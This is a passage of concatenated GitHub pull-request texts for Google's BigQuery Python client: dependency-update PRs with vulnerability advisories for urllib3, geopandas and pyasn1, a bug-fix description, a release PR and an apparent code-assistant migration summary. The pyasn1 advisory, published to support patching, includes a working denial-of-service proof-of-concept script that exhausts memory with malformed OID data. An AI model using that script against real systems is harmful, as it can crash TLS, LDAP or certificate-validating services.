is designed for the efficient handling of large HTTP responses by
reading the content in chunks, rather than loading the entire response
body into memory at once.

urllib3 can perform decoding or decompression based on the HTTP
`Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`).
When using the streaming API, the library decompresses only the
necessary bytes, enabling partial content consumption.

However, for HTTP redirect responses, the library would read the entire
response body to drain the connection and decompress the content
unnecessarily. This decompression occurred even before any read methods
were called, and configured read limits did not restrict the amount of
decompressed data. As a result, there was no safeguard against
decompression bombs. A malicious server could exploit this to trigger
excessive resource consumption on the client (high CPU usage and large
memory allocations for decompressed data; CWE-409).

### Affected usages

Applications and libraries using urllib3 version 2.6.2 and earlier to
stream content from untrusted sources by setting `preload_content=False`
when they do not disable redirects.

### Remediation

Upgrade to at least urllib3 v2.6.3 in which the library does not decode
content of redirect responses when `preload_content=False`.

If upgrading is not immediately possible, disable
[redirects](https://urllib3.readthedocs.io/en/2.6.2/user-guide.html#retrying-requests)
by setting `redirect=False` for requests to untrusted source.

---

### Release Notes

<details>
<summary>urllib3/urllib3 (urllib3)</summary>

###
[`v2.6.3`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#263-2026-01-07)

[Compare
Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.2...2.6.3)

\==================

- Fixed a high-severity security issue where decompression-bomb
safeguards of
  the streaming API were bypassed when HTTP redirects were followed.
(`GHSA-38jv-5279-wg99
<https://github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99>`\_\_)
- Started treating `Retry-After` times greater than 6 hours as 6 hours
by
default. (`#&#8203;3743
<https://github.com/urllib3/urllib3/issues/3743>`\_\_)
- Fixed `urllib3.connection.VerifiedHTTPSConnection` on Emscripten.
  (`#&#8203;3752 <https://github.com/urllib3/urllib3/issues/3752>`\_\_)

###
[`v2.6.2`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#262-2025-12-11)

[Compare
Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.1...2.6.2)

\==================

- Fixed `HTTPResponse.read_chunked()` to properly handle leftover data
in
  the decoder's buffer when reading compressed chunked responses.
  (`#&#8203;3734 <https://github.com/urllib3/urllib3/issues/3734>`\_\_)

###
[`v2.6.1`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#261-2025-12-08)

[Compare
Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.0...2.6.1)

\==================

- Restore previously removed `HTTPResponse.getheaders()` and
  `HTTPResponse.getheader()` methods.
  (`#&#8203;3731 <https://github.com/urllib3/urllib3/issues/3731>`\_\_)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/googleapis/python-bigquery).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42OS4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjkuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOltdfQ==-->

Co-authored-by: Anthonios Partheniou <partheniou@google.com>
**Description**

This PR fixes a crash when handling `_InactiveRpcError` during retry
logic and ensures proper `timeout` propagation in
`RowIterator.to_dataframe`.

**Fixes**

**Retry Logic Crash**: Addressed an issue in
`google/cloud/bigquery/retry.py` where `_should_retry` would raise a
`TypeError` when inspecting unstructured `gRPC` errors (like
`_InactiveRpcError`). The fix adds robust error inspection to fallback
gracefully when `exc.errors` is not subscriptable.

**Timeout Propagation**: Added the missing `timeout` parameter to
`RowIterator.to_dataframe` in `google/cloud/bigquery/table.py`. This
ensures that the user-specified `timeout` is correctly passed down to
the underlying `to_arrow` call, preventing the client from hanging
indefinitely when the Storage API is unresponsive.

**Changes**

Modified `google/cloud/bigquery/retry.py`: Updated `_should_retry` to
handle `TypeError` and `KeyError` when accessing `exc.errors`.
Modified `google/cloud/bigquery/table.py`: Updated
`RowIterator.to_dataframe` signature and implementation to accept and
pass the `timeout` parameter.

The first half of this work was completed in PR #2354
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [geopandas](https://redirect.github.com/geopandas/geopandas) |
`==1.1.1` → `==1.1.2` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/geopandas/1.1.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/geopandas/1.1.1/1.1.2?slim=true)
|

### GitHub Vulnerability Alerts

#### [CVE-2025-69662](https://nvd.nist.gov/vuln/detail/CVE-2025-69662)

SQL injection vulnerability in geopandas before v.1.1.2 allows an
attacker to obtain sensitive information via the to_postgis()` function
being used to write GeoDataFrames to a PostgreSQL database.

---

### Release Notes

<details>
<summary>geopandas/geopandas (geopandas)</summary>

###
[`v1.1.2`](https://redirect.github.com/geopandas/geopandas/blob/HEAD/CHANGELOG.md#Version-112-December-22-2025)

[Compare
Source](https://redirect.github.com/geopandas/geopandas/compare/v1.1.1...v1.1.2)

Bug fixes:

- Fix an issue that caused an error in `GeoDataFrame.from_features` when
there is no `properties` field
([#&#8203;3599](https://redirect.github.com/geopandas/geopandas/issues/3599)).
- Fix `read_file` and `to_file` errors
([#&#8203;3682](https://redirect.github.com/geopandas/geopandas/issues/3682))
- Fix `read_parquet` with `to_pandas_kwargs` for complex (list/struct)
arrow types
([#&#8203;3640](https://redirect.github.com/geopandas/geopandas/issues/3640))
- `value_counts` on GeoSeries now preserves CRS in index
([#&#8203;3669](https://redirect.github.com/geopandas/geopandas/issues/3669))
- Fix f-string placeholders appearing in error messages when `pyogrio`
cannot be imported
([#&#8203;3682](https://redirect.github.com/geopandas/geopandas/issues/3682)).
- Fix `read_parquet` with `to_pandas_kwargs` for complex (list/struct)
arrow types
([#&#8203;3640](https://redirect.github.com/geopandas/geopandas/issues/3640)).
- `.to_json` now provides a clearer error message when called on a
GeoDataFrame without an active geometry
column
([#&#8203;3648](https://redirect.github.com/geopandas/geopandas/issues/3648)).
- Calling `del gdf["geometry"]` now will downcast to a `pd.DataFrame` if
there are no geometry columns left
in the dataframe
([#&#8203;3648](https://redirect.github.com/geopandas/geopandas/issues/3648)).
- Fix SQL injection in `to_postgis` via geometry column name
([#&#8203;3681](https://redirect.github.com/geopandas/geopandas/issues/3681)).

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/googleapis/python-bigquery).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi45Mi4xIiwidXBkYXRlZEluVmVyIjoiNDIuOTIuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOltdfQ==-->
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [pyasn1](https://redirect.github.com/pyasn1/pyasn1)
([changelog](https://pyasn1.readthedocs.io/en/latest/changelog.html)) |
`==0.6.1` → `==0.6.2` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/pyasn1/0.6.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/pyasn1/0.6.1/0.6.2?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2026-23490](https://redirect.github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq)

### Summary

After reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found
that leads to memory exhaustion from malformed RELATIVE-OID with
excessive continuation octets.

### Details

The integer issue can be found in the decoder as `reloid += ((subId <<
7) + nextSubId,)`:
https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496

### PoC

For the DoS:
```py
import pyasn1.codec.ber.decoder as decoder
import pyasn1.type.univ as univ
import sys
import resource

# Deliberately set memory limit to display PoC
try:
    resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))
    print("[*] Memory limit set to 100MB")
except:
    print("[-] Could not set memory limit")

# Test with different payload sizes to find the DoS threshold
payload_size_mb = int(sys.argv[1])

print(f"[*] Testing with {payload_size_mb}MB payload...")

payload_size = payload_size_mb * 1024 * 1024

# Create payload with continuation octets
# Each 0x81 byte indicates continuation, causing bit shifting in decoder
payload = b'\x81' * payload_size + b'\x00'
length = len(payload)

# DER length encoding (supports up to 4GB)
if length < 128:
    length_bytes = bytes([length])
elif length < 256:
    length_bytes = b'\x81' + length.to_bytes(1, 'big')
elif length < 256**2:
    length_bytes = b'\x82' + length.to_bytes(2, 'big')
elif length < 256**3:
    length_bytes = b'\x83' + length.to_bytes(3, 'big')
else:
    # 4 bytes can handle up to 4GB
    length_bytes = b'\x84' + length.to_bytes(4, 'big')

# Use OID (0x06) for more aggressive parsing
malicious_packet = b'\x06' + length_bytes + payload

print(f"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB")

try:
    print("[*] Decoding (this may take time or exhaust memory)...")
    result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())

    print(f'[+] Decoded successfully')
    print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')

    # Try to convert to string
    print('[*] Converting to string...')
    try:
        str_result = str(result[0])
        print(f'[+] String succeeded: {len(str_result)} chars')
        if len(str_result) > 10000:
            print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!')
    except MemoryError:
        print(f'[-] MemoryError during string conversion!')
    except Exception as e:
        print(f'[-] {type(e).__name__} during string conversion')

except MemoryError:
    print('[-] MemoryError: Out of memory!')
except Exception as e:
    print(f'[-] Error: {type(e).__name__}: {e}')

print("\n[*] Test completed")
```

Screenshots with the results:

#### DoS
<img width="944" height="207" alt="Screenshot_20251219_160840"
src="https://github.com/user-attachments/assets/68b9566b-5ee1-47b0-a269-605b037dfc4f"
/>

<img width="931" height="231" alt="Screenshot_20251219_152815"
src="https://github.com/user-attachments/assets/62eacf4f-eb31-4fba-b7a8-e8151484a9fa"
/>

#### Leak analysis

A potential heap leak was investigated but came back clean:
```
[*] Creating 1000KB payload...
[*] Decoding with pyasn1...
[*] Materializing to string...
[+] Decoded 2157784 characters
[+] Binary representation: 896001 bytes
[+] Dumped to heap_dump.bin

[*] First 64 bytes (hex):
  01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081

[*] First 64 bytes (ASCII/hex dump):
  0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02  ..... @&#8203;..... @&#8203;..
  0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08  ... @&#8203;..... @&#8203;....
  0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20  . @&#8203;..... @&#8203;..... 
  0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81  @&#8203;..... @&#8203;..... @&#8203;.

[*] Digit distribution analysis:
  '0':  10.1%
  '1':   9.9%
  '2':  10.0%
  '3':   9.9%
  '4':   9.9%
  '5':  10.0%
  '6':  10.0%
  '7':  10.0%
  '8':   9.9%
  '9':  10.1%
```

### Scenario

1. An attacker creates a malicious X.509 certificate.
2. The application validates certificates.
3. The application accepts the malicious certificate and tries decoding
resulting in the issues mentioned above.

### Impact

This issue can affect resource consumption and hang systems or stop
services.
This may affect:
- LDAP servers
- TLS/SSL endpoints
- OCSP responders
- etc.

### Recommendation

Add a limit to the allowed bytes in the decoder.

---

### Release Notes

<details>
<summary>pyasn1/pyasn1 (pyasn1)</summary>

###
[`v0.6.2`](https://redirect.github.com/pyasn1/pyasn1/blob/HEAD/CHANGES.rst#Revision-062-released-16-01-2026)

[Compare
Source](https://redirect.github.com/pyasn1/pyasn1/compare/v0.6.1...v0.6.2)

- CVE-2026-23490 (GHSA-63vm-454h-vhhq): Fixed continuation octet limits
  in OID/RELATIVE-OID decoder (thanks to tsigouris007)
- Added support for Python 3.14
  [pr #&#8203;97](https://redirect.github.com/pyasn1/pyasn1/pull/97)
- Added SECURITY.md policy
- Fixed unit tests failing due to missing code
[issue #&#8203;91](https://redirect.github.com/pyasn1/pyasn1/issues/91)
  [pr #&#8203;92](https://redirect.github.com/pyasn1/pyasn1/pull/92)
- Migrated to pyproject.toml packaging
  [pr #&#8203;90](https://redirect.github.com/pyasn1/pyasn1/pull/90)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/googleapis/python-bigquery).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi43NC41IiwidXBkYXRlZEluVmVyIjoiNDMuOC41IiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6W119-->
PR created by the Librarian CLI to initialize a release. Merging this PR will auto trigger a release.

Librarian Version: v0.8.0
Language Image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620
<details><summary>google-cloud-bigquery: 3.40.1</summary>

## [3.40.1](https://togithub.com/googleapis/python-bigquery/compare/v3.40.0...v3.40.1) (2026-02-12)

### Bug Fixes

* updates timeout/retry code to respect hanging server (#2408) ([24d45d0d](https://togithub.com/googleapis/python-bigquery/commit/24d45d0d))

* add timeout parameter to to_dataframe and to_arrow met… (#2354) ([4f67ba20](https://togithub.com/googleapis/python-bigquery/commit/4f67ba20))

### Documentation

* clarify that only jobs.query and jobs.getQueryResults are affec… (#2349) ([73228432](https://togithub.com/googleapis/python-bigquery/commit/73228432))

</details>
… into migration.python-bigquery.migration.2026-03-02_16-59-45.migrate
@gemini-code-assist
Copy link
Contributor

Summary of Changes

Hello, I'm Gemini Code Assist1! I'm currently reviewing this pull request and will post my feedback shortly. In the meantime, here's a summary to help you and other reviewers quickly get up to speed!

This pull request completes a significant architectural change by migrating the Google Cloud BigQuery Python client library into a dedicated package directory. This restructuring aims to consolidate the project's codebase, streamline its development lifecycle, and integrate it more effectively into a monorepo environment. The migration includes all source code, documentation, and continuous integration configurations, ensuring that the package is fully functional and independently manageable within its new location.

Highlights

  • Repository Migration: The entire google-cloud-bigquery Python client library, along with its associated tooling and documentation, has been migrated into a new packages/google-cloud-bigquery directory within the repository.
  • Infrastructure Setup: New GitHub workflows, Kokoro CI/CD configurations, pre-commit hooks, and code ownership definitions have been established to support the new package structure and ensure consistent development practices.
  • Documentation Relocation: All project-level documentation, including README.rst, CONTRIBUTING.rst, LICENSE, SECURITY.md, TROUBLESHOOTING.md, UPGRADING.md, and CODE_OF_CONDUCT.md, has been moved to reside within the new package directory.
  • Core Library and Benchmarks: The complete google.cloud.bigquery Python package, including its submodules and benchmark scripts, has been relocated as part of this migration.
Changelog
  • packages/google-cloud-bigquery/.coveragerc
    • Added coverage configuration file.
  • packages/google-cloud-bigquery/.flake8
    • Added flake8 linting configuration.
  • packages/google-cloud-bigquery/.github/CODEOWNERS
    • Added GitHub CODEOWNERS file for the package.
  • packages/google-cloud-bigquery/.github/CONTRIBUTING.md
    • Added contributing guidelines for the package.
  • packages/google-cloud-bigquery/.github/ISSUE_TEMPLATE/bug_report.md
    • Added bug report issue template.
  • packages/google-cloud-bigquery/.github/ISSUE_TEMPLATE/feature_request.md
    • Added feature request issue template.
  • packages/google-cloud-bigquery/.github/ISSUE_TEMPLATE/support_request.md
    • Added support request issue template.
  • packages/google-cloud-bigquery/.github/PULL_REQUEST_TEMPLATE.md
    • Added pull request template.
  • packages/google-cloud-bigquery/.github/auto-label.yaml
    • Added auto-label configuration for pull requests.
  • packages/google-cloud-bigquery/.github/blunderbuss.yml
    • Added blunderbuss configuration for issue and PR assignments.
  • packages/google-cloud-bigquery/.github/header-checker-lint.yml
    • Added header checker lint configuration.
  • packages/google-cloud-bigquery/.github/workflows/docs.yml
    • Added GitHub Actions workflow for documentation builds.
  • packages/google-cloud-bigquery/.github/workflows/unittest.yml
    • Added GitHub Actions workflow for unit tests across Python versions.
  • packages/google-cloud-bigquery/.gitignore
    • Added git ignore file for common development artifacts.
  • packages/google-cloud-bigquery/.kokoro/build.sh
    • Added Kokoro build script.
  • packages/google-cloud-bigquery/.kokoro/continuous/common.cfg
    • Added common configuration for continuous Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/continuous/continuous.cfg
    • Added continuous Kokoro build configuration.
  • packages/google-cloud-bigquery/.kokoro/continuous/prerelease-deps-3.13.cfg
    • Added prerelease dependencies configuration for Python 3.13 on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/continuous/unit-tests-misc.cfg
    • Added miscellaneous unit test configuration for continuous Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/populate-secrets.sh
    • Added script to populate secrets for Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/presubmit/common.cfg
    • Added common configuration for presubmit Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/presubmit/linting-typing.cfg
    • Added linting and typing configuration for presubmit Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/presubmit/prerelease-deps.cfg
    • Added prerelease dependencies configuration for presubmit Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/presubmit/snippets-3.13.cfg
    • Added snippets configuration for Python 3.13 on presubmit Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/presubmit/snippets-3.9.cfg
    • Added snippets configuration for Python 3.9 on presubmit Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/presubmit/system-3.13.cfg
    • Added system test configuration for Python 3.13 on presubmit Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/presubmit/system-3.9.cfg
    • Added system test configuration for Python 3.9 on presubmit Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/samples/lint/common.cfg
    • Added common linting configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/lint/continuous.cfg
    • Added continuous linting configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/lint/periodic.cfg
    • Added periodic linting configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/lint/presubmit.cfg
    • Added presubmit linting configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.10/common.cfg
    • Added common Python 3.10 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.10/continuous.cfg
    • Added continuous Python 3.10 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.10/periodic-head.cfg
    • Added periodic-head Python 3.10 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.10/periodic.cfg
    • Added periodic Python 3.10 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.10/presubmit.cfg
    • Added presubmit Python 3.10 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.11/common.cfg
    • Added common Python 3.11 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.11/continuous.cfg
    • Added continuous Python 3.11 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.11/periodic-head.cfg
    • Added periodic-head Python 3.11 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.11/periodic.cfg
    • Added periodic Python 3.11 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.11/presubmit.cfg
    • Added presubmit Python 3.11 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.12/common.cfg
    • Added common Python 3.12 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.12/continuous.cfg
    • Added continuous Python 3.12 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.12/periodic-head.cfg
    • Added periodic-head Python 3.12 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.12/periodic.cfg
    • Added periodic Python 3.12 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.12/presubmit.cfg
    • Added presubmit Python 3.12 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.13/common.cfg
    • Added common Python 3.13 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.13/continuous.cfg
    • Added continuous Python 3.13 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.13/periodic-head.cfg
    • Added periodic-head Python 3.13 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.13/periodic.cfg
    • Added periodic Python 3.13 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.13/presubmit.cfg
    • Added presubmit Python 3.13 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.14/common.cfg
    • Added common Python 3.14 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.14/continuous.cfg
    • Added continuous Python 3.14 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.14/periodic-head.cfg
    • Added periodic-head Python 3.14 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.14/periodic.cfg
    • Added periodic Python 3.14 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.14/presubmit.cfg
    • Added presubmit Python 3.14 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.9/common.cfg
    • Added common Python 3.9 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.9/continuous.cfg
    • Added continuous Python 3.9 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.9/periodic-head.cfg
    • Added periodic-head Python 3.9 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.9/periodic.cfg
    • Added periodic Python 3.9 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/samples/python3.9/presubmit.cfg
    • Added presubmit Python 3.9 configuration for samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/test-samples-against-head.sh
    • Added script for testing samples against head on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/test-samples-impl.sh
    • Added implementation script for testing samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/test-samples.sh
    • Added main script for testing samples on Kokoro.
  • packages/google-cloud-bigquery/.kokoro/trampoline.sh
    • Added trampoline script for Kokoro builds.
  • packages/google-cloud-bigquery/.kokoro/trampoline_v2.sh
    • Added version 2 trampoline script for Kokoro builds.
  • packages/google-cloud-bigquery/.librarian/state.yaml
    • Added librarian state configuration.
  • packages/google-cloud-bigquery/.pre-commit-config.yaml
    • Added pre-commit configuration for linting and formatting.
  • packages/google-cloud-bigquery/.repo-metadata.json
    • Added repository metadata file.
  • packages/google-cloud-bigquery/.trampolinerc
    • Added trampoline configuration file.
  • packages/google-cloud-bigquery/CODE_OF_CONDUCT.md
    • Added code of conduct document.
  • packages/google-cloud-bigquery/CONTRIBUTING.rst
    • Added contributing guidelines document.
  • packages/google-cloud-bigquery/LICENSE
    • Added Apache 2.0 license file.
  • packages/google-cloud-bigquery/MANIFEST.in
    • Added manifest file for package distribution.
  • packages/google-cloud-bigquery/README.rst
    • Added main README file for the package.
  • packages/google-cloud-bigquery/SECURITY.md
    • Added security policy document.
  • packages/google-cloud-bigquery/TROUBLESHOOTING.md
    • Added troubleshooting guide.
  • packages/google-cloud-bigquery/UPGRADING.md
    • Added upgrading guide for major library versions.
  • packages/google-cloud-bigquery/benchmark/README.md
    • Added README for BigQuery benchmark scripts.
  • packages/google-cloud-bigquery/benchmark/benchmark.py
    • Added Python script for BigQuery benchmarking.
  • packages/google-cloud-bigquery/benchmark/queries.json
    • Added JSON file containing benchmark queries.
  • packages/google-cloud-bigquery/docs/.gitignore
    • Added gitignore for documentation build artifacts.
  • packages/google-cloud-bigquery/docs/README.rst
    • Added README for documentation, linking to main README.
  • packages/google-cloud-bigquery/docs/UPGRADING.md
    • Added UPGRADING document for documentation, linking to main UPGRADING.
  • packages/google-cloud-bigquery/docs/_static/custom.css
    • Added custom CSS for Sphinx documentation styling.
  • packages/google-cloud-bigquery/docs/_templates/layout.html
    • Added custom layout template for Sphinx documentation, including Python 2 EOL warning.
  • packages/google-cloud-bigquery/docs/bigquery/legacy_proto_types.rst
    • Added reStructuredText document for legacy proto-based types.
  • packages/google-cloud-bigquery/docs/bigquery/standard_sql.rst
    • Added reStructuredText document for standard SQL types.
  • packages/google-cloud-bigquery/docs/changelog.md
    • Added changelog document for documentation, linking to main CHANGELOG.
  • packages/google-cloud-bigquery/docs/conf.py
    • Added Sphinx configuration file for documentation generation.
  • packages/google-cloud-bigquery/docs/dbapi.rst
    • Added reStructuredText document for DB-API reference.
  • packages/google-cloud-bigquery/docs/design/index.rst
    • Added index for client library design documents.
  • packages/google-cloud-bigquery/docs/design/query-retries.md
    • Added design document for query retries.
  • packages/google-cloud-bigquery/docs/enums.rst
    • Added reStructuredText document for BigQuery enums.
  • packages/google-cloud-bigquery/docs/format_options.rst
    • Added reStructuredText document for BigQuery format options.
  • packages/google-cloud-bigquery/docs/generated/google.cloud.bigquery.magics.html
    • Added redirect HTML for BigQuery magics documentation.
  • packages/google-cloud-bigquery/docs/index.rst
    • Added main index for Sphinx documentation.
  • packages/google-cloud-bigquery/docs/job_base.rst
    • Added reStructuredText document for common job resource classes.
  • packages/google-cloud-bigquery/docs/magics.rst
    • Added reStructuredText document for IPython magics.
  • packages/google-cloud-bigquery/docs/query.rst
    • Added reStructuredText document for query resource classes.
  • packages/google-cloud-bigquery/docs/reference.rst
    • Added reStructuredText document for API reference.
  • packages/google-cloud-bigquery/docs/samples
    • Added samples directory for documentation, linking to main samples.
  • packages/google-cloud-bigquery/docs/snippets.py
    • Added Python snippets for documentation examples.
  • packages/google-cloud-bigquery/docs/summary_overview.md
    • Added summary overview markdown for documentation.
  • packages/google-cloud-bigquery/docs/usage.html
    • Added redirect HTML for usage documentation.
  • packages/google-cloud-bigquery/docs/usage/client.rst
    • Added reStructuredText document for client usage.
  • packages/google-cloud-bigquery/docs/usage/datasets.rst
    • Added reStructuredText document for dataset management.
  • packages/google-cloud-bigquery/docs/usage/encryption.rst
    • Added reStructuredText document for encryption usage.
  • packages/google-cloud-bigquery/docs/usage/index.rst
    • Added index for usage guides.
  • packages/google-cloud-bigquery/docs/usage/jobs.rst
    • Added reStructuredText document for job management.
  • packages/google-cloud-bigquery/docs/usage/pandas.rst
    • Added reStructuredText document for Pandas integration.
  • packages/google-cloud-bigquery/docs/usage/queries.rst
    • Added reStructuredText document for query execution.
  • packages/google-cloud-bigquery/docs/usage/tables.rst
    • Added reStructuredText document for table management.
  • packages/google-cloud-bigquery/google/cloud/bigquery/init.py
    • Added package initialization file, including version and module imports.
  • packages/google-cloud-bigquery/google/cloud/bigquery/_helpers.py
    • Added shared helper functions for BigQuery API classes.
  • packages/google-cloud-bigquery/google/cloud/bigquery/_http.py
    • Added HTTP connection class for BigQuery.
  • packages/google-cloud-bigquery/google/cloud/bigquery/_job_helpers.py
    • Added helpers for interacting with job REST APIs.
  • packages/google-cloud-bigquery/google/cloud/bigquery/_pandas_helpers.py
    • Added shared helper functions for connecting BigQuery and pandas.
  • packages/google-cloud-bigquery/google/cloud/bigquery/_pyarrow_helpers.py
    • Added shared helper functions for connecting BigQuery and pyarrow.
  • packages/google-cloud-bigquery/google/cloud/bigquery/_tqdm_helpers.py
    • Added shared helper functions for tqdm progress bar integration.
  • packages/google-cloud-bigquery/google/cloud/bigquery/_versions_helpers.py
    • Added shared helper functions for verifying installed module versions.
  • packages/google-cloud-bigquery/google/cloud/bigquery/dataset.py
    • Added dataset classes and related helpers.
  • packages/google-cloud-bigquery/google/cloud/bigquery/dbapi/init.py
    • Added DB-API package initialization, including connection and cursor classes.
  • packages/google-cloud-bigquery/google/cloud/bigquery/dbapi/_helpers.py
    • Added helpers for DB-API parameter formatting and type conversion.
  • packages/google-cloud-bigquery/google/cloud/bigquery/dbapi/connection.py
    • Added DB-API connection class.
  • packages/google-cloud-bigquery/google/cloud/bigquery/dbapi/cursor.py
    • Added DB-API cursor class.
  • packages/google-cloud-bigquery/google/cloud/bigquery/dbapi/exceptions.py
    • Added custom exception classes for DB-API.
  • packages/google-cloud-bigquery/google/cloud/bigquery/dbapi/types.py
    • Added type objects for DB-API.
  • packages/google-cloud-bigquery/google/cloud/bigquery/encryption_configuration.py
    • Added class for custom encryption configuration.
  • packages/google-cloud-bigquery/google/cloud/bigquery/enums.py
    • Added various enum classes for BigQuery operations and types.
